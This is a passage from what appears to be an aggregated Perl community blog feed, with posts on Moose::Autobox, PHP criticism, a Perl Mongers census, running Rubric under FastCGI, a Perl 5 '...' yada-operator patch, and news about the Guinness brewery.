The precedence of -> is higher than \, so it took a reference to the result
of @array->method, which was equivalent (as I recall) to:
(my $x = @array)->method
...so, not very useful.
Over the last few weeks, these two bugs have been addressed. The only thing that I'm still not entirely sold on is that this does not do the right thing:
my @new = grep { ... } @old->sort;
Sure, I could write @old->sort->flatten, but that's not the point. I
want the result of sort to be usable as a flat list, the same way @old was.
Coding that would require knowing that the invocant of the autoboxing class's
method was not a reference to begin with, and that information isn't available.
Still, it's not bad at all. This morning I released a new Moose::Autobox,
adding a flatten method to both Array and Hash. I think I see a lot of
autoboxing in my future!
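For instance, here is a hedged sketch of the new flatten method in use, per the behavior described above:

use Moose::Autobox;

my @old = qw(pear apple orange);
my @new = grep { /e$/ } @old->sort->flatten;   # sort gives an array ref;
print "@new\n";                                # flatten gives back a list: apple orange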
Read more of this story at use Perl.
Adam Scheinberg makes an argument for PHP, which is fine in itself, but misses a key point about those of us who are horrified by PHP as a language.
I argue that everyone posting about how PHP is a bad language as a whole is an idiot. Every single one. Each is a foolish, arrogant, nerd sheep who can't think for themselves.
Scheinberg acknowledges some of the problems with PHP, but then says that PHP is good because you can run it all over the place, and many big sites serve lots of traffic with it, and boy isn't mod_perl a pain in the ass to install? And sometimes PHP is just a great tool for the job at hand:
[t]hose who would forsake "the right tool for the job at hand" shouldn't be trusted even to water your plants, because they are obviously nitwits. If you can't concede that PHP can be the right tool some of the time for some situations, you shouldn't be trusted to code or make adult decisions.
Can't disagree with that at all, Adam. It's all a matter of using the right tool for the job. Sometimes that right tool for the job just happens to be a crappy language.
So, as foolish, arrogant, idiot nerd sheep, we can agree that:
Nonetheless, PHP is still an awful language, and in my decision-making process, the pain & anguish I go through to use it means it rarely winds up as the right tool for the job.
Yesterday I sent out 353 mail messages to the PM group leaders using the contact details in the PM master XML document.
Almost instantly, I got 58 bounce messages back. That's an error rate approaching 1 in 6. A sixth of the contact addresses that we are publishing on pm.org are invalid. What kind of an impression does that give to people trying to contact a PM group? And that's after I posted messages a fortnight ago (on use.perl and on Perl Monks) asking leaders to check their contact details.
Oh and I got one reply from a challenge-response system. There's a special circle of hell reserved for people who use challenge-response systems. Especially on email addresses that are published as contact addresses.
If there's anyone reading this who should have received a mail but didn't, can you please contact me at census[at]pm.org so we can fix the problem. You might also check your contact details at http://pm.org/groups/ and email any corrections to support[at]pm.org.
Now I remember why it's been three years since the last census. It takes that long for me to forget what a massive headache it all is :-)
p.s. Oh, but before I forget. A big thank you to the over one hundred group leaders who have already responded.
Steve Yegge transcribed an excellent talk he gave on dynamic languages. It's incredibly thought-provoking and worth reading all the way through. And for the pseudo-obligatory Perl content, here is one of his comments on marketing:
I mean, like, Perl was a marketing success, right? But it didn't have Sun or Microsoft or somebody hyping it. It had, you know, the guy in the cube next to you saying "Hey, check out this Perl. I know you're using Awk, but Perl's, like, weirder!"
And for the Big Bucket of Fail, someone named "dibblego" had this to say about Yegge's pre-emptive apology regarding some of his colorful comments:
Steve,
Some of these people are more likely to be offended by your compulsion to pass severely under-qualified comment on the topic; something you have done more than once before. The offense comes about because it is almost deliberately misleading to others who might have the desire to learn and are not in a position to know any better and may mistake your pseudo-scientific nonsense with warranted factual claims.
I say "almost deliberate" because I am more inclined to believe your desire to continue doing this is a result of your ignorance rather than malice.
Here's a tip for you kids: "dibblego" might be right, but we'll never know since he never bothers to back up his assertions. Hell, if you're going to be rude, at least be rude with some meat on, will ya?
On another note, Yegge commented that many issues with Java generics require relatively newer programmers to have at least an implicit understanding of covariance and contravariance. These deal with the substitutability of return types and parameters in OO systems (roughly: an overriding method may return a more specific type than it promises, but may only accept more general parameter types, never more restrictive ones) and, and, and ...
Boom!
Here's a tip for language designers: if an oft-used feature of your language requires a deep understanding of comp-sci/math, programmers are going to get it wrong. Here be dragons. It's OK to allow things to require advanced concepts, but not for common code that you hope to spread to the masses.
For extra credit, try to find a clear, concise explanation of covariance and contravariance (and invariance, while you're at it) that your typical Jack in the Box programmer is going to be willing to read, much less understand.
On a side note, I still think it would be good to have a "Just Enough Theory" book for programmers that explains the basics they need to know to prevent the "beat them to death with Knuth" fantasies. I don't expect a new programmer to understand why restricting first-order predicate logic to Horn clauses is considered (by some) to be a weakness, but they had better know about loose coupling and cohesive functions.
This site offers a nifty utility for dealing with those annoying sites which offer only partial text content in their RSS and Atom feeds.
Given an RSS or Atom feed’s URL, the CGI will iterate through the posts in the feed, scrape the full text of each post from its HTML page, and re-generate a new RSS feed containing the full text.
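As a hedged sketch of the idea (not the site's actual code; the URL and the scraping pattern are made up, and a real service needs per-site heuristics), the whole loop is pleasantly small in Perl:

use LWP::Simple qw(get);
use XML::RSS;

my $rss = XML::RSS->new;
$rss->parse( get('http://example.com/partial.rss') );

for my $item ( @{ $rss->{items} } ) {
    my $html = get( $item->{link} ) or next;
    # Naive scrape: keep whatever sits in the first post div.
    my ($body) = $html =~ m{<div class="post">(.*?)</div>}s;
    $item->{description} = $body if defined $body;
}

print $rss->as_string;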
The one thing it’s missing is a one-click bookmarklet version. So here it is:
Drag that to your bookmarks menu, and next time you’re looking at a partial-text feed, click the bookmark to transform the viewed page into the full-text version. Enjoy!
Quite a while ago, I suggested to ABE.pm that we should get together and do some group hacking. When someone said, "HACKATHON??" I said, "Good grief, no!" I just wanted to do some messing about and have fun, without worrying about goals or accomplishments. Also, "hackathon" sounds like the hacking equivalent of running 26.2 miles: gruelling. I wanted to make sure it was clear that the point was to hang out, and that hacking was just the entertainment.
At any rate, since I knew we had our technical venue booked for this past week and I knew that I didn't have any good talks prepared and I knew I wasn't going to get a guest speaker with no notice, I declared that it was time for hacking. For a project, I decided we'd play with a game I was working on earlier in the year. It still has oodles of things that need to be done, ranging from the trivial to the really complex. It uses lots of fun new stuff, and it's just sort of a fun project in general.
I installed Debian (sid) on a virtual machine on my Mac, installed all the prerequisites, git, and some other essentials, and briefly refamiliarized myself with the code we'd be working on. Unfortunately, not all of this happened before the event began -- but that's fine. We still had a good time. A few bugs got fixed, some new ones got revealed, and I think everyone had a pretty good time.
Next time, we should be able to get started much faster. I've made a lot of improvements to the virt's setup based on our experiences that night, and I've learned a few good things about git and some other involved tools.
I'm itching to have another hacking session, but I'll have to wait for July. Our next meeting, in June, is a social meeting. While I'm very tempted to declare that we'll be doing a tech meeting again, that would mean that we would not go to McGrady's for hot wings and a Fahy burger. I don't think I can get behind that kind of trade-off.
In case anyone has been thinking, "Gosh, I haven't seen anything from rjbs lately," the reason is ridiculous. It's not that I've been busy (but I have) or lazy (but I am). It's that I've been stupid.
When I relocated some of my hosted services to Linode (who, by the way, are awesome), I decided that running Rubric as a CGI script was insane. It's always been slow and inefficient, and I knew I could make it much, much faster by making the process persistent. On my previous host, where TIMS also ran, I saw how much faster Rubric could be under mod_perl, but I had some minor problems and wasn't interested in futzing with Apache, which I vaguely dislike.
On my new host, I switched everything to lighttpd, and I figured I'd use FastCGI. I thought this would be trivial, but the state of the art for moving CGI things to FastCGI seemed to be lousy. Someone finally pointed me at Stevan Little's fantastic FCGI::Engine. It did exactly what I wanted, making Rubric work with no code changes at all... or so I thought.
First, query parameters stopped changing. The first query to hit the daemon
would have its QUERY_STRING parsed and nothing else would ever get looked at.
I fixed that by shoving an initialize_globals call in Rubric's run method.
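The fix, as a hedged sketch (Rubric's real run method differs): CGI.pm caches its parsed parameters in package globals, and a persistent FastCGI process has to reset them for every request.

use CGI ();

sub run {
    my ($self) = @_;
    CGI::initialize_globals();    # forget the previous request's parameters
    # ... dispatch the request as before ...
}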
Things seemed alright until I tried to log in to post. No matter what, HTTP
POST requests were coming through with no content. I stared at it until I gave
up, and then I couldn't post anything new because I couldn't log in.
That was that, until tonight. I checked on my Hiveminder todo list and saw 78 things to do. (Good grief!) The second one is a reminder to get new App::Cmd stuff done by a week ago, and I thought, "Gosh. I should get that done, and then post an explanation of why the changes are so good."
Then I thought, "I can't post anything new, my Rubric won't let me log in!"
Then I thought, "I need to fix Rubric under FastCGI before I start on any of the other 78 things in my todo list." I guess this is a story about being lazy and busy, too.
I resorted to looking through the source of Rubric, CGI::Application, FCGI, FCGI::Engine, and other things. I finally noticed that FCGI::Engine passed a CGI::Simple query into the code it called -- a fact that was not documented. Once I added the dozen-or-so characters needed to tell Rubric to use that query instead of a newly-built one, everything just worked. Awesome! Once again, it goes to show that reading the source is always a good strategy.
I've filed a ticket suggesting that the docs should mention the parameter.
Now I need to get to work posting old news!
Here's an idea that occurs to me frequently when making slides for conference tutorials. Sometimes I make a slide and I know that it might be too advanced, but it's a crap shoot. If the vast majority of the audience understands the slide, I can save several slides by not explaining it. If enough people look confused, I want to display those slides. I don't mind making the slides up front, but I'd like to be able to only show them if I think it's needed.
I wonder if there's some way to make good Keynote triggers that would let me
say something like: "if you want to explain why 1 + 1 = 1, press F1;
otherwise, press Next."
Choose your own slideshow.
I also wonder whether the Visor program that I saw ages ago is triggerable during a slide show. It looks good, and it would be convenient to keep a giant-font terminal ready to slide down to demonstrate answers to hard questions.
Read more of this story at use Perl.
As promised a couple of weeks ago, I've sent a census email to all registered leaders of Perl Mongers groups. If you are the leader of a group and you haven't received the mail, then please contact me at census[at]pm.org.
Results should follow in a few weeks (dependent on how soon the group leaders respond).
Read more of this story at use Perl.
Phew! The rumours were untrue. Diageo will not be closing down the Guinness brewery, and will continue brewing the black stuff in Dublin 8, thankfully:
Diageo is to close its breweries at Kilkenny and Dundalk, significantly reduce its brewing capacity at St James’s Gate and build a new brewery on the outskirts of Dublin under a plan announced today.
The company said it would invest EUR 650 million (£520 million) between 2009 and 2013 in the restructuring.
The renovation of the St James’s Gate brewing operations is expected to cost around EUR 70 million and will see the volume of Guinness brewed there fall from around one billion pints a year, to just over 500 million.
This plant will serve the Irish and British markets and will be based on the Thomas St side of the site. The company said this would ensure that every pint of Guinness sold in Ireland would be brewed here. Approximately half of the 55 acre site will then be sold once the five-year project is complete.
Around 65 staff will remain in brewing operations at St James’s Gate with about 100 others due to transfer to the new Dublin plant. Although the company has yet to announce the exact location of its new brewery, it says the plant will have a capacity of around nine million hectolitres, or around three times that of the refurbished St James’s Gate site. This new brewery will produce Guinness for export and ales and lagers for the Irish market.
Diageo said that when the two Dublin breweries are fully operational in five years’ time it will transfer brewing out of the Kilkenny and Dundalk breweries and close these plants. This move will result in ‘a net reduction in staff of around 250’, the company said.
The company employs 800 people in its brewing operation and a total of 2,500 in the Republic and Northern Ireland.
Diageo said these two plants “do not have the scale necessary for sustained success in increasingly competitive market conditions”.
The company said it would offer those employees relocation opportunities where possible. Those for whom relocation is not possible will be offered “a severance package alongside career counselling”.
Operations at its Waterford brewery will be “streamlined” as part of the re-organisation, leading to “some reduction in output”. The current workforce of 27 in Waterford will be reduced to ‘around 18’, but Diageo was unable to confirm the extent of the output reduction.
The company says the St James’s Gate site it proposes to sell and the Kilkenny and Dundalk sites have an estimated value of EUR 510 million.
The Guinness Storehouse, which receives around 900,000 visitors a year, will continue to be based at St. James’s Gate.
The company estimates it will incur one-off costs of EUR 152 million during the restructuring and says this would be treated as an exceptional cost in the fiscal year ending in June 2008.
Paul Walsh, chief executive of Diageo, said: ‘Over the last twelve months we have conducted a rigorous review of our brewing operations in Ireland. It examined many options and I believe it has identified the right formula for the long-term success of our business in Ireland and for the continued global success of the Guinness brand.’
“Our ambition is to combine the most modern brewing standards with almost 300 years of brewing tradition, craft and heritage.”
Guinness has been brewed at St James’s Gate for almost 250 years. Guinness extract produced at the Dublin site is exported to more than 45 countries.
Graham (who runs search.cpan.org) let us know that two of the machines appeared to be running very slowly, and he thought it might be NFS related, as everything else looked fine.
Here's what we found looking at where requests to our NFS server were coming from...
oops.
Turns out Apache::Reload had been accidentally turned on on one of the production servers for geourl and *every* page hit was causing a stat of a few hundred .pm files. Turned it off, and NFS load dropped by 80%, and everything went back to normal.
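For reference, the foot-gun is easy to arm. This is a hedged sketch of the relevant mod_perl 1 era configuration (check the Apache::Reload docs for your mod_perl generation); with it on, every request stat()s each loaded .pm file to check for changes:

# httpd.conf
PerlInitHandler Apache::Reload
PerlSetVar ReloadAll On    # stat every module in %INC on every request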
Tune in next week for "Don't use NFS in production".
(And yes, this entire post exists to show off the pretty Google Chart.)
Perl 6 has three code placeholder operators — ..., ???, and !!! — known affectionately as the "yada, yada, yada" operators (see List Prefix Precedence in Synopsis 3). It's a matter of (very sarcastic) public record how much I love writing, maintaining, and patching parsers, so I've just sent a very preliminary five-line patch to p5p to add support for ... to Perl 5.
--- perly.y~ 2008-05-09 17:47:35.000000000 -0700
+++ perly.y 2008-05-09 17:47:41.000000000 -0700
@@ -1227,6 +1227,11 @@
}
| WORD
| listop
+ | DOTDOT
+ {
+ $$ = newUNOP(OP_DIE, 0,
+ newSVOP(OP_CONST, 0, newSVpvs("Unimplemented")))
+ }
;
/* "my" declarations, with optional attributes */
Apply this to recentish bleadperl sources, run perl regen_perly.pl, rebuild, and now you can run programs such as:
sub foo { ... }
foo();
And get an "Unimplemented at <file> line <line>." error message.
(Now everyone who complains that I don't code enough to match my talk, please punch yourself in the face.)
Read more of this story at use Perl.
For almost a year I have not dealt with the Open Source Test Automation research that I started with this article: Quality Assurance and Automated Testing in Open Source Software
Today I have decided I'll try to give another push to this project. At this point what mostly interests me is how projects written in PHP, Python and Ruby test themselves. Actually, I should also look at projects written in Perl, but at least I know those living on CPAN. Maybe I should look at other projects that are not on CPAN.
The questions I am asking myself are as follows:
Read more of this story at use Perl.